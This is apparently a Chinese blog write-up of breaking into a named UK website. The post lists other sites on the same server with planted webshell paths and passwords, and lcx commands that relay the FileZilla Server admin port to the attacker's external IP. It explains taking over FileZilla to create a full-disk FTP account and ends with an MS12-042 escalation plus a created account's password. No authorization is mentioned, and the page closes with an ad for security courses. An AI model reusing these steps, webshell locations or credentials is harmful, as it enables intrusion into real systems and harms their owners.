网站制作难不难佛山网站制作流程
2026/2/17 6:36:22
单位网站建设典型材料做计划的网站
单位网站建设典型材料,做计划的网站,开发软件的app,win2008iis配置网站前言
这次的目标是一个英国小网站#xff0c;目的是拿下这个站点指定文件的修改权限。习惯性的在渗透某个目标之前先对目标进行基本的信息搜集#xff0c;这样在后面的渗透过程中可以省下不少时间#xff0c;此次的渗透可以说80%的运气#xff0c;20%的经验才顺利拿到目标…前言这次的目标是一个英国小网站目的是拿下这个站点指定文件的修改权限。习惯性的在渗透某个目标之前先对目标进行基本的信息搜集这样在后面的渗透过程中可以省下不少时间此次的渗透可以说80%的运气20%的经验才顺利拿到目标权限。基本信息探测目标站点http://www.wem****.co.uk服务器IP9*.1*9.1*4.*2英国环境平台ASP.NET服务器系统Microsoft-IIS/7.5PORT STATE SERVICE VERSION21/tcpopenftpFileZilla ftpd0.9.41 beta80/tcpopenhttp Microsoft HTTPAPI httpd2.0(SSDP/UPnP)Getshell过程这里就简化写了先在主站仔细找找上传、注入、Fckeditor和敏感文件、目录结果都没找到主站基本没戏了接着拿御剑对目标站的旁站进行扫描后来去忙其他事了放着在扫事情忙完后还看了部电影准备关电脑睡觉的时候才发现御剑还在扫着的呢都快给忘了。打开御剑把扫描到的链接导出来用了半小时检测虽然发现了一些上传、注入Fckeditor啥的但感觉这些漏洞好像都被别人修复过了接着往下看找到了几个敏感文件名打开看既然是一个大马和一句话木马通过弱口令和爆破方式成功得到密码。弱口令测试 http://www.berkshire--workshops.co.uk/test.aspx Passadmin 一句话爆破 http://www.sonnergy*shade.co.uk/css.asp Pass110爆破字典https://github.com/3had0w/Fuzzing-Dicts注成功拿到这个目标网站的Webshell权限可以说运气成份很大但也需要一定的细心、耐心和经验这几点在做渗透测试时也是非常重要的。实战提权过程由于这次目的是拿下这个目标站点指定文件的修改权限所以我们得先去看看能不能直接跨到目标站点路径如果不能直接跨过去或者是没有修改权限时再去想其它办法进行提权。经过测试发现可直接跨到目标站并且具备上传、新建和删除文件权限但就是没有修改权限2008的提权EXP不多尝试了各种已知提权EXP均以失败告终可以再去试一下MSF的提权模块找第三方软件提权前期的信息探测中已知系统运行着FileZilla ftpd 0.9.41 beta软件找找看有没有安装的有FileZilla Server服务端注可以用netstat -ano、tasklist命令来查看目标机器中是否安装的有可用于提权的第三方软件如Radmin、Gene6FTP、FileZilla Server等。Filezilla Serve这个软件在国外服务器用的还是挺多的21端口是客户端连接时需要的14147端口则是服务端运行时需要的。我们的提权方法就是利用端口转发方式直接登录到目标机器的Filezilla Server服务端然后创建一个拥有全盘目录权限的FTP账户。(1) 使用netstat -ano、tasklist命令确认目标服务器是否运行了Filezilla Server软件是不是用默认的14147端口或者是修改为其它端口了如下图。(2) Filezilla Server服务端一般都会默认安装在C、D盘下的\Program Files\文件夹中这里我已经提前找到了安装目录下有2个重要的XML配置文件。用来保存管理员用户信息 C:\Program Files\FileZilla Server\FileZillaServer Interface.xml 用来保存普通FTP用户信息 C:\Program Files\FileZilla Server\FileZilla Server.xml(3) 本地执行lcx.exe -listen 51 14147首先本机监听51端口连接用14147端口。(4) Webshell上执行lcx.exe -slave 外网IP 51 127.0.0.1 14147。(5) 本地运行打包下来的Filezilla Server打开后会自动读取配置文件里的账户密码进行连接。注如果出现连接不上的情况这可能是因为我们本地的Filezilla Server与目标的Filezilla Server版本不一致为了避免这个问题可以直接将服务器上的Filezilla Server整个文件夹打包下来运行。(6) Filezilla Server上创建一个拥有C、D盘权限账户将读取/写入/创建/删除权限都给勾选上。(7) 这里给的D盘权限是因为目标网站都放在D盘只要达到能修改指定文件目的就行大家在实际测试过程中可以选择添加C盘权限然后再进行下一步的提权操作这里目的已经达到指定文件已经有了修改权限所以就暂时没再继续提服务器了FTP权限已经足够用了隔了几天后用MS12-042提权EXP成功拿到服务器权限帐号luoye密码456$love。思考总结(1) 服务器外网配置文件有修改权限直接修改FileZilla Server.xml配置文件这种情况应该比较少见就不再详细写了。(2) 服务器外网配置文件只读权限通过端口转发工具将端口转发出来如果服务器不在内网随便一款端口转发都可以。(3) 服务器内网配置文件只读权限利用lcx.exe将内网端口转发出来与2的方法是一样的只不过一个内网一个外网。外网服务器用端口转发功能突破配置文件只读限制内网服务器用端口转发功能突破内网连接及配置文件只读限制网络安全学习资源分享:给大家分享一份全套的网络安全学习资料给那些想学习 网络安全的小伙伴们一点帮助对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。因篇幅有限仅展示部分资料朋友们如果有需要全套《网络安全入门进阶学习资源包》请看下方扫描即可前往获取